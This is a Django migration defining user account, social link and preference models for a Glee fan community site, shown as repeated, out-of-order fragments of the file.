want. You", "map.', max_length=200, null=True, verbose_name='Location', blank=True)), ('location_changed', models.BooleanField(default=False)), ('latitude', models.FloatField(null=True, blank=True)), ('longitude', models.FloatField(null=True, blank=True)),", "choices=[(b'Android', b'Android'), (b'iOs', b'iOs')])), ('device', models.CharField(help_text='The modele of your device. Example: Nexus 5,", "Facebook')), ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)), ('account_id', models.PositiveIntegerField(help_text='To find your ID, tap the settings", "are allowed.')])), ('relevance', models.PositiveIntegerField(null=True, verbose_name='How often do you tweet/stream/post about Glee?', choices=[(0, 'Never'),", "models.NullBooleanField(verbose_name='Accept friend requests on Facebook')), ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)), ('account_id', models.PositiveIntegerField(help_text='To find your", "('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)), ('account_id', models.PositiveIntegerField(help_text='To find your ID, tap the settings icon,", "django.db import models, migrations import django.db.models.deletion from django.conf import settings import django.core.validators class", "models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserPreferences', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False,", "'Every single day')])), ('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserPreferences',", "blank=True)), ('donation_link_title', models.CharField(max_length=100, null=True, blank=True)), ('favorite_performer', models.ForeignKey(related_name='fans', on_delete=django.db.models.deletion.SET_NULL, to='web.Performer', null=True)), ('following', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL)),", "_ characters are allowed.')])), ('relevance', models.PositiveIntegerField(null=True, verbose_name='How often do you tweet/stream/post about Glee?',", "('type', models.CharField(max_length=20, verbose_name='Platform', choices=[(b'facebook', b'Facebook'), (b'twitter', b'Twitter'), (b'reddit', b'Reddit'), (b'schoolidolu', b'School Idol Tomodachi'),", "choices=[(b'Thumbs', 'Thumbs'), (b'Fingers', 'All fingers'), (b'Index', 'Index fingers'), (b'Hand', 'One hand'), (b'Other', 'Other')])),", "choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER', 'Idol", "('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests on Facebook')), ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)), ('account_id', models.PositiveIntegerField(help_text='To find", "'One hand'), (b'Other', 'Other')])), ('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests on Facebook')), ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank',", "tap the settings icon, then tap \"Profile\". Your ID is the number you", "blank=True)), ('os', models.CharField(default=b'iOs', max_length=10, verbose_name='Operating System', choices=[(b'Android', b'Android'), (b'iOs', b'iOs')])), ('device', models.CharField(help_text='The modele", "Messenger'), (b'tumblr', b'Tumblr'), (b'twitch', b'Twitch'), (b'steam', b'Steam'), (b'instagram', b'Instagram'), (b'youtube', b'YouTube'), (b'github', b'GitHub')])),", "verbose_name='Play with', choices=[(b'Thumbs', 'Thumbs'), (b'Fingers', 'All fingers'), (b'Index', 'Index fingers'), (b'Hand', 'One hand'),", "auto_created=True, primary_key=True)), ('type', models.CharField(max_length=20, verbose_name='Platform', choices=[(b'facebook', b'Facebook'), (b'twitter', b'Twitter'), (b'reddit', b'Reddit'), (b'schoolidolu', b'School", "hand'), (b'Other', 'Other')])), ('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests on Facebook')), ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)),", "]*$', b'Only alphanumeric and - _ characters are allowed.')])), ('relevance', models.PositiveIntegerField(null=True, verbose_name='How often", "the map.', max_length=200, null=True, verbose_name='Location', blank=True)), ('location_changed', models.BooleanField(default=False)), ('latitude', models.FloatField(null=True, blank=True)), ('longitude', models.FloatField(null=True,", "coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations import", "__future__ import unicode_literals from django.db import models, migrations import django.db.models.deletion from django.conf import", "System', choices=[(b'Android', b'Android'), (b'iOs', b'iOs')])), ('device', models.CharField(help_text='The modele of your device. Example: Nexus", "on the map.', max_length=200, null=True, verbose_name='Location', blank=True)), ('location_changed', models.BooleanField(default=False)), ('latitude', models.FloatField(null=True, blank=True)), ('longitude',", "(b'reddit', b'Reddit'), (b'schoolidolu', b'School Idol Tomodachi'), (b'line', b'LINE Messenger'), (b'tumblr', b'Tumblr'), (b'twitch', b'Twitch'),", "b'Twitter'), (b'reddit', b'Reddit'), (b'schoolidolu', b'School Idol Tomodachi'), (b'line', b'LINE Messenger'), (b'tumblr', b'Tumblr'), (b'twitch',", "Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('web', '0001_initial'), ] operations = [ migrations.CreateModel( name='Account',", "Tomodachi'), (b'line', b'LINE Messenger'), (b'tumblr', b'Tumblr'), (b'twitch', b'Twitch'), (b'steam', b'Steam'), (b'instagram', b'Instagram'), (b'youtube',", "serialize=False, auto_created=True, primary_key=True)), ('type', models.CharField(max_length=20, verbose_name='Platform', choices=[(b'facebook', b'Facebook'), (b'twitter', b'Twitter'), (b'reddit', b'Reddit'), (b'schoolidolu',", "verbose_name='How often do you tweet/stream/post about Glee?', choices=[(0, 'Never'), (1, 'Sometimes'), (2, 'Often'),", "Idol Devotee')])), ('donation_link', models.CharField(max_length=200, null=True, blank=True)), ('donation_link_title', models.CharField(max_length=100, null=True, blank=True)), ('favorite_performer', models.ForeignKey(related_name='fans', on_delete=django.db.models.deletion.SET_NULL,", "from django.conf import settings import django.core.validators class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('web',", "unicode_literals from django.db import models, migrations import django.db.models.deletion from django.conf import settings import", "dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('web', '0001_initial'), ] operations = [ migrations.CreateModel( name='Account', fields=[", "bases=(models.Model,), ), migrations.CreateModel( name='UserPreferences', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('description', models.TextField(help_text='Write whatever", "validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\. ]*$', b'Only alphanumeric and - _ characters are allowed.')])), ('relevance', models.PositiveIntegerField(null=True, verbose_name='How", "tweet/stream/post about Glee?', choices=[(0, 'Never'), (1, 'Sometimes'), (2, 'Often'), (3, 'Every single day')])),", "models.CharField(blank=True, max_length=30, null=True, verbose_name='Play with', choices=[(b'Thumbs', 'Thumbs'), (b'Fingers', 'All fingers'), (b'Index', 'Index fingers'),", "you live in. It might take up to 24 hours to update your", "('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('nickname', models.CharField(max_length=20, verbose_name='Nickname', blank=True)), ('os', models.CharField(default=b'iOs', max_length=10, verbose_name='Operating", "Lover'), (b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER', 'Idol Producer'), (b'DEVOTEE', 'Ultimate Idol Devotee')])), ('donation_link', models.CharField(max_length=200,", "import django.db.models.deletion from django.conf import settings import django.core.validators class Migration(migrations.Migration): dependencies = [", "Nexus 5, iPhone 4, iPad 2, ...', max_length=150, null=True, verbose_name='Device', blank=True)), ('play_with', models.CharField(blank=True,", "(b'iOs', b'iOs')])), ('device', models.CharField(help_text='The modele of your device. Example: Nexus 5, iPhone 4,", "do you tweet/stream/post about Glee?', choices=[(0, 'Never'), (1, 'Sometimes'), (2, 'Often'), (3, 'Every", "[ migrations.CreateModel( name='Account', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('nickname', models.CharField(max_length=20, verbose_name='Nickname', blank=True)),", "max_length=10, verbose_name='Operating System', choices=[(b'Android', b'Android'), (b'iOs', b'iOs')])), ('device', models.CharField(help_text='The modele of your device.", "('location', models.CharField(help_text='The city you live in. It might take up to 24 hours", "(b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER', 'Idol Producer'), (b'DEVOTEE', 'Ultimate Idol Devotee')])), ('donation_link', models.CharField(max_length=200, null=True,", "device. Example: Nexus 5, iPhone 4, iPad 2, ...', max_length=150, null=True, verbose_name='Device', blank=True)),", "you see on top of the window.', null=True, verbose_name='ID', blank=True)), ('owner', models.ForeignKey(related_name='accounts', to=settings.AUTH_USER_MODEL)),", "[ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('web', '0001_initial'), ] operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.AutoField(verbose_name='ID',", "('relevance', models.PositiveIntegerField(null=True, verbose_name='How often do you tweet/stream/post about Glee?', choices=[(0, 'Never'), (1, 'Sometimes'),", "('status', models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol", "to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserPreferences', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True,", "django.conf import settings import django.core.validators class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('web', '0001_initial'),", "of the window.', null=True, verbose_name='ID', blank=True)), ('owner', models.ForeignKey(related_name='accounts', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,),", "(b'steam', b'Steam'), (b'instagram', b'Instagram'), (b'youtube', b'YouTube'), (b'github', b'GitHub')])), ('value', models.CharField(help_text='Write your username only,", "('donation_link', models.CharField(max_length=200, null=True, blank=True)), ('donation_link_title', models.CharField(max_length=100, null=True, blank=True)), ('favorite_performer', models.ForeignKey(related_name='fans', on_delete=django.db.models.deletion.SET_NULL, to='web.Performer', null=True)),", "('os', models.CharField(default=b'iOs', max_length=10, verbose_name='Operating System', choices=[(b'Android', b'Android'), (b'iOs', b'iOs')])), ('device', models.CharField(help_text='The modele of", "models.PositiveIntegerField(null=True, verbose_name='How often do you tweet/stream/post about Glee?', choices=[(0, 'Never'), (1, 'Sometimes'), (2,", "your username only, no URL.', max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\. ]*$', b'Only alphanumeric and -", "models.CharField(max_length=20, verbose_name='Platform', choices=[(b'facebook', b'Facebook'), (b'twitter', b'Twitter'), (b'reddit', b'Reddit'), (b'schoolidolu', b'School Idol Tomodachi'), (b'line',", "(b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER', 'Idol Producer'), (b'DEVOTEE',", "Example: Nexus 5, iPhone 4, iPad 2, ...', max_length=150, null=True, verbose_name='Device', blank=True)), ('play_with',", "the settings icon, then tap \"Profile\". Your ID is the number you see", "your device. Example: Nexus 5, iPhone 4, iPad 2, ...', max_length=150, null=True, verbose_name='Device',", "It might take up to 24 hours to update your location on the", "'0001_initial'), ] operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),", "), migrations.CreateModel( name='UserLink', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('type', models.CharField(max_length=20, verbose_name='Platform', choices=[(b'facebook',", "django.db.models.deletion from django.conf import settings import django.core.validators class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL),", "models.CharField(help_text='The city you live in. It might take up to 24 hours to", "('account_id', models.PositiveIntegerField(help_text='To find your ID, tap the settings icon, then tap \"Profile\". Your", "('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('description', models.TextField(help_text='Write whatever you want. You can add", "about Glee?', choices=[(0, 'Never'), (1, 'Sometimes'), (2, 'Often'), (3, 'Every single day')])), ('owner',", "(b'twitch', b'Twitch'), (b'steam', b'Steam'), (b'instagram', b'Instagram'), (b'youtube', b'YouTube'), (b'github', b'GitHub')])), ('value', models.CharField(help_text='Write your", "verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\. ]*$', b'Only alphanumeric and - _ characters are allowed.')])), ('relevance', models.PositiveIntegerField(null=True,", "import django.core.validators class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('web', '0001_initial'), ] operations =", "b'YouTube'), (b'github', b'GitHub')])), ('value', models.CharField(help_text='Write your username only, no URL.', max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\.", "('web', '0001_initial'), ] operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True,", "('donation_link_title', models.CharField(max_length=100, null=True, blank=True)), ('favorite_performer', models.ForeignKey(related_name='fans', on_delete=django.db.models.deletion.SET_NULL, to='web.Performer', null=True)), ('following', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL)), ('user',", "top of the window.', null=True, verbose_name='ID', blank=True)), ('owner', models.ForeignKey(related_name='accounts', to=settings.AUTH_USER_MODEL)), ], options={ },", "('latitude', models.FloatField(null=True, blank=True)), ('longitude', models.FloatField(null=True, blank=True)), ('status', models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol", "serialize=False, auto_created=True, primary_key=True)), ('description', models.TextField(help_text='Write whatever you want. You can add formatting and", "b'Only alphanumeric and - _ characters are allowed.')])), ('relevance', models.PositiveIntegerField(null=True, verbose_name='How often do", "hours to update your location on the map.', max_length=200, null=True, verbose_name='Location', blank=True)), ('location_changed',", "b'Steam'), (b'instagram', b'Instagram'), (b'youtube', b'YouTube'), (b'github', b'GitHub')])), ('value', models.CharField(help_text='Write your username only, no", "Devotee')])), ('donation_link', models.CharField(max_length=200, null=True, blank=True)), ('donation_link_title', models.CharField(max_length=100, null=True, blank=True)), ('favorite_performer', models.ForeignKey(related_name='fans', on_delete=django.db.models.deletion.SET_NULL, to='web.Performer',", "serialize=False, auto_created=True, primary_key=True)), ('nickname', models.CharField(max_length=20, verbose_name='Nickname', blank=True)), ('os', models.CharField(default=b'iOs', max_length=10, verbose_name='Operating System', choices=[(b'Android',", "blank=True)), ('location', models.CharField(help_text='The city you live in. It might take up to 24", "-*- from __future__ import unicode_literals from django.db import models, migrations import django.db.models.deletion from", "window.', null=True, verbose_name='ID', blank=True)), ('owner', models.ForeignKey(related_name='accounts', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel(", "('nickname', models.CharField(max_length=20, verbose_name='Nickname', blank=True)), ('os', models.CharField(default=b'iOs', max_length=10, verbose_name='Operating System', choices=[(b'Android', b'Android'), (b'iOs', b'iOs')])),", "b'Facebook'), (b'twitter', b'Twitter'), (b'reddit', b'Reddit'), (b'schoolidolu', b'School Idol Tomodachi'), (b'line', b'LINE Messenger'), (b'tumblr',", "null=True, verbose_name='ID', blank=True)), ('owner', models.ForeignKey(related_name='accounts', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserLink',", "), migrations.CreateModel( name='UserPreferences', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('description', models.TextField(help_text='Write whatever you", "(b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER', 'Idol Producer'), (b'DEVOTEE', 'Ultimate Idol Devotee')])),", "update your location on the map.', max_length=200, null=True, verbose_name='Location', blank=True)), ('location_changed', models.BooleanField(default=False)), ('latitude',", "'Idol Ambassador'), (b'PRODUCER', 'Idol Producer'), (b'DEVOTEE', 'Ultimate Idol Devotee')])), ('donation_link', models.CharField(max_length=200, null=True, blank=True)),", "using Markdown.', null=True, verbose_name='Description', blank=True)), ('location', models.CharField(help_text='The city you live in. It might", "models.TextField(help_text='Write whatever you want. You can add formatting and links using Markdown.', null=True,", "primary_key=True)), ('type', models.CharField(max_length=20, verbose_name='Platform', choices=[(b'facebook', b'Facebook'), (b'twitter', b'Twitter'), (b'reddit', b'Reddit'), (b'schoolidolu', b'School Idol", "models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('nickname', models.CharField(max_length=20, verbose_name='Nickname', blank=True)), ('os', models.CharField(default=b'iOs', max_length=10, verbose_name='Operating System',", "blank=True)), ('favorite_performer', models.ForeignKey(related_name='fans', on_delete=django.db.models.deletion.SET_NULL, to='web.Performer', null=True)), ('following', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL)), ('user', models.OneToOneField(related_name='preferences', to=settings.AUTH_USER_MODEL)), ],", "models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('description', models.TextField(help_text='Write whatever you want. You can add formatting", "b'Instagram'), (b'youtube', b'YouTube'), (b'github', b'GitHub')])), ('value', models.CharField(help_text='Write your username only, no URL.', max_length=64,", "null=True, verbose_name='Play with', choices=[(b'Thumbs', 'Thumbs'), (b'Fingers', 'All fingers'), (b'Index', 'Index fingers'), (b'Hand', 'One", "models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('type', models.CharField(max_length=20, verbose_name='Platform', choices=[(b'facebook', b'Facebook'), (b'twitter', b'Twitter'), (b'reddit', b'Reddit'),", "null=True, blank=True)), ('favorite_performer', models.ForeignKey(related_name='fans', on_delete=django.db.models.deletion.SET_NULL, to='web.Performer', null=True)), ('following', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL)), ('user', models.OneToOneField(related_name='preferences', to=settings.AUTH_USER_MODEL)),", "], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserPreferences', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),", "models.ForeignKey(related_name='fans', on_delete=django.db.models.deletion.SET_NULL, to='web.Performer', null=True)), ('following', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL)), ('user', models.OneToOneField(related_name='preferences', to=settings.AUTH_USER_MODEL)), ], options={ },", "'Often'), (3, 'Every single day')])), ('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ),", "blank=True)), ('longitude', models.FloatField(null=True, blank=True)), ('status', models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER',", "models.CharField(max_length=20, verbose_name='Nickname', blank=True)), ('os', models.CharField(default=b'iOs', max_length=10, verbose_name='Operating System', choices=[(b'Android', b'Android'), (b'iOs', b'iOs')])), ('device',", "django.core.validators class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('web', '0001_initial'), ] operations = [", "characters are allowed.')])), ('relevance', models.PositiveIntegerField(null=True, verbose_name='How often do you tweet/stream/post about Glee?', choices=[(0,", "name='UserLink', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('type', models.CharField(max_length=20, verbose_name='Platform', choices=[(b'facebook', b'Facebook'), (b'twitter',", "(b'tumblr', b'Tumblr'), (b'twitch', b'Twitch'), (b'steam', b'Steam'), (b'instagram', b'Instagram'), (b'youtube', b'YouTube'), (b'github', b'GitHub')])), ('value',", "('device', models.CharField(help_text='The modele of your device. Example: Nexus 5, iPhone 4, iPad 2,", "(b'Hand', 'One hand'), (b'Other', 'Other')])), ('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests on Facebook')), ('rank', models.PositiveIntegerField(null=True,", "from django.db import models, migrations import django.db.models.deletion from django.conf import settings import django.core.validators", "fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('type', models.CharField(max_length=20, verbose_name='Platform', choices=[(b'facebook', b'Facebook'), (b'twitter', b'Twitter'),", "to='web.Performer', null=True)), ('following', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL)), ('user', models.OneToOneField(related_name='preferences', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ),", "(b'Fingers', 'All fingers'), (b'Index', 'Index fingers'), (b'Hand', 'One hand'), (b'Other', 'Other')])), ('accept_friend_requests', models.NullBooleanField(verbose_name='Accept", "verbose_name='Nickname', blank=True)), ('os', models.CharField(default=b'iOs', max_length=10, verbose_name='Operating System', choices=[(b'Android', b'Android'), (b'iOs', b'iOs')])), ('device', models.CharField(help_text='The", "verbose_name='Platform', choices=[(b'facebook', b'Facebook'), (b'twitter', b'Twitter'), (b'reddit', b'Reddit'), (b'schoolidolu', b'School Idol Tomodachi'), (b'line', b'LINE", "'All fingers'), (b'Index', 'Index fingers'), (b'Hand', 'One hand'), (b'Other', 'Other')])), ('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend", "('description', models.TextField(help_text='Write whatever you want. You can add formatting and links using Markdown.',", "is the number you see on top of the window.', null=True, verbose_name='ID', blank=True)),", "'Thumbs'), (b'Fingers', 'All fingers'), (b'Index', 'Index fingers'), (b'Hand', 'One hand'), (b'Other', 'Other')])), ('accept_friend_requests',", "blank=True)), ('status', models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR',", "b'iOs')])), ('device', models.CharField(help_text='The modele of your device. Example: Nexus 5, iPhone 4, iPad", "verbose_name='Rank', blank=True)), ('account_id', models.PositiveIntegerField(help_text='To find your ID, tap the settings icon, then tap", "\"Profile\". Your ID is the number you see on top of the window.',", "live in. It might take up to 24 hours to update your location", "options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserPreferences', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('description',", "null=True, verbose_name='Description', blank=True)), ('location', models.CharField(help_text='The city you live in. It might take up", "on_delete=django.db.models.deletion.SET_NULL, to='web.Performer', null=True)), ('following', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL)), ('user', models.OneToOneField(related_name='preferences', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,),", "auto_created=True, primary_key=True)), ('nickname', models.CharField(max_length=20, verbose_name='Nickname', blank=True)), ('os', models.CharField(default=b'iOs', max_length=10, verbose_name='Operating System', choices=[(b'Android', b'Android'),", "4, iPad 2, ...', max_length=150, null=True, verbose_name='Device', blank=True)), ('play_with', models.CharField(blank=True, max_length=30, null=True, verbose_name='Play", "'Idol Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER', 'Idol Producer'), (b'DEVOTEE', 'Ultimate", "iPad 2, ...', max_length=150, null=True, verbose_name='Device', blank=True)), ('play_with', models.CharField(blank=True, max_length=30, null=True, verbose_name='Play with',", "add formatting and links using Markdown.', null=True, verbose_name='Description', blank=True)), ('location', models.CharField(help_text='The city you", "max_length=150, null=True, verbose_name='Device', blank=True)), ('play_with', models.CharField(blank=True, max_length=30, null=True, verbose_name='Play with', choices=[(b'Thumbs', 'Thumbs'), (b'Fingers',", "icon, then tap \"Profile\". Your ID is the number you see on top", "('value', models.CharField(help_text='Write your username only, no URL.', max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\. ]*$', b'Only alphanumeric", "null=True, verbose_name='Location', blank=True)), ('location_changed', models.BooleanField(default=False)), ('latitude', models.FloatField(null=True, blank=True)), ('longitude', models.FloatField(null=True, blank=True)), ('status', models.CharField(max_length=12,", "ID is the number you see on top of the window.', null=True, verbose_name='ID',", "('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserPreferences', fields=[ ('id', models.AutoField(verbose_name='ID',", "on Facebook')), ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)), ('account_id', models.PositiveIntegerField(help_text='To find your ID, tap the", "options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserLink', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('type',", "24 hours to update your location on the map.', max_length=200, null=True, verbose_name='Location', blank=True)),", "models.PositiveIntegerField(help_text='To find your ID, tap the settings icon, then tap \"Profile\". Your ID", "import models, migrations import django.db.models.deletion from django.conf import settings import django.core.validators class Migration(migrations.Migration):", "primary_key=True)), ('description', models.TextField(help_text='Write whatever you want. You can add formatting and links using", "null=True, verbose_name='Device', blank=True)), ('play_with', models.CharField(blank=True, max_length=30, null=True, verbose_name='Play with', choices=[(b'Thumbs', 'Thumbs'), (b'Fingers', 'All", "in. It might take up to 24 hours to update your location on", "b'GitHub')])), ('value', models.CharField(help_text='Write your username only, no URL.', max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\. ]*$', b'Only", "ID, tap the settings icon, then tap \"Profile\". Your ID is the number", "models.BooleanField(default=False)), ('latitude', models.FloatField(null=True, blank=True)), ('longitude', models.FloatField(null=True, blank=True)), ('status', models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER',", "null=True, blank=True)), ('donation_link_title', models.CharField(max_length=100, null=True, blank=True)), ('favorite_performer', models.ForeignKey(related_name='fans', on_delete=django.db.models.deletion.SET_NULL, to='web.Performer', null=True)), ('following', models.ManyToManyField(related_name='followers',", "fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('description', models.TextField(help_text='Write whatever you want. You can", "= [ migrations.CreateModel( name='Account', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('nickname', models.CharField(max_length=20, verbose_name='Nickname',", "blank=True)), ('account_id', models.PositiveIntegerField(help_text='To find your ID, tap the settings icon, then tap \"Profile\".", "no URL.', max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\. ]*$', b'Only alphanumeric and - _ characters are", "'Other')])), ('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests on Facebook')), ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)), ('account_id', models.PositiveIntegerField(help_text='To", "location on the map.', max_length=200, null=True, verbose_name='Location', blank=True)), ('location_changed', models.BooleanField(default=False)), ('latitude', models.FloatField(null=True, blank=True)),", "on top of the window.', null=True, verbose_name='ID', blank=True)), ('owner', models.ForeignKey(related_name='accounts', to=settings.AUTH_USER_MODEL)), ], options={", "models.FloatField(null=True, blank=True)), ('status', models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol Lover'),", "(b'instagram', b'Instagram'), (b'youtube', b'YouTube'), (b'github', b'GitHub')])), ('value', models.CharField(help_text='Write your username only, no URL.',", "max_length=200, null=True, verbose_name='Location', blank=True)), ('location_changed', models.BooleanField(default=False)), ('latitude', models.FloatField(null=True, blank=True)), ('longitude', models.FloatField(null=True, blank=True)), ('status',", "models.ForeignKey(related_name='accounts', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserLink', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False,", "tap \"Profile\". Your ID is the number you see on top of the", "the window.', null=True, verbose_name='ID', blank=True)), ('owner', models.ForeignKey(related_name='accounts', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ),", "allowed.')])), ('relevance', models.PositiveIntegerField(null=True, verbose_name='How often do you tweet/stream/post about Glee?', choices=[(0, 'Never'), (1,", "models.CharField(default=b'iOs', max_length=10, verbose_name='Operating System', choices=[(b'Android', b'Android'), (b'iOs', b'iOs')])), ('device', models.CharField(help_text='The modele of your", "can add formatting and links using Markdown.', null=True, verbose_name='Description', blank=True)), ('location', models.CharField(help_text='The city", "], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserLink', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),", "Ambassador'), (b'PRODUCER', 'Idol Producer'), (b'DEVOTEE', 'Ultimate Idol Devotee')])), ('donation_link', models.CharField(max_length=200, null=True, blank=True)), ('donation_link_title',", "utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations import django.db.models.deletion", "(2, 'Often'), (3, 'Every single day')])), ('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,),", "your location on the map.', max_length=200, null=True, verbose_name='Location', blank=True)), ('location_changed', models.BooleanField(default=False)), ('latitude', models.FloatField(null=True,", "city you live in. It might take up to 24 hours to update", "...', max_length=150, null=True, verbose_name='Device', blank=True)), ('play_with', models.CharField(blank=True, max_length=30, null=True, verbose_name='Play with', choices=[(b'Thumbs', 'Thumbs'),", "('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('type', models.CharField(max_length=20, verbose_name='Platform', choices=[(b'facebook', b'Facebook'), (b'twitter', b'Twitter'), (b'reddit',", "- _ characters are allowed.')])), ('relevance', models.PositiveIntegerField(null=True, verbose_name='How often do you tweet/stream/post about", "('favorite_performer', models.ForeignKey(related_name='fans', on_delete=django.db.models.deletion.SET_NULL, to='web.Performer', null=True)), ('following', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL)), ('user', models.OneToOneField(related_name='preferences', to=settings.AUTH_USER_MODEL)), ], options={", "Glee?', choices=[(0, 'Never'), (1, 